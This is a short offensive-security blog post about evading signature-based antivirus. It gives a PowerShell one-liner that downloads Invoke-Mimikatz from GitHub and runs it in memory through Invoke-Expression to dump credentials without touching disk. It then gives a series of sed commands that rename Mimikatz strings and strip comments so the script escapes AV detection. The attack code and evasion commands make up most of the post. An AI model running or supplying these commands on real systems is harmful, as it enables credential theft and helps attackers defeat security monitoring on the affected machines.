This post is a simple shout out to a blog post I enjoyed reading and that proves a point I have repeated endlessly throughout Hack like a Pornstar & Hack a Fashion Brand: AV products that rely on signatures (that’s almost all of them) can be trivially bypassed!
If you recall, when executing PowerShell scripts on targets, we used the awesome Invoke-Expression commandlet, something along the lines of:
$browser = New-Object System.Net.WebClient $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials mimi= $browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1") Invoke-Expression(mimi) Invoke-Mimikatz
The script Invoke-Mimikatz.ps1 was run directly in memory. No file on disk, no Antivirus alert.
However, more and more AV vendors are talking about monitoring in memory activity. Monitoring is a big word really, most of the time they simply look for known strings or keywords. A few perform real behavioral analysis but even that can be bypassed – we will talk about it in a future post.
How to avoid being detected then? a couple of simple tricks :
- Removing any mention of Mimikatz in the file
- Removing comments
- Renaming some function names
That’s it really… The guys at BlackHills gave us this simple bash script to do the job efficiently! Thanks guys !
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1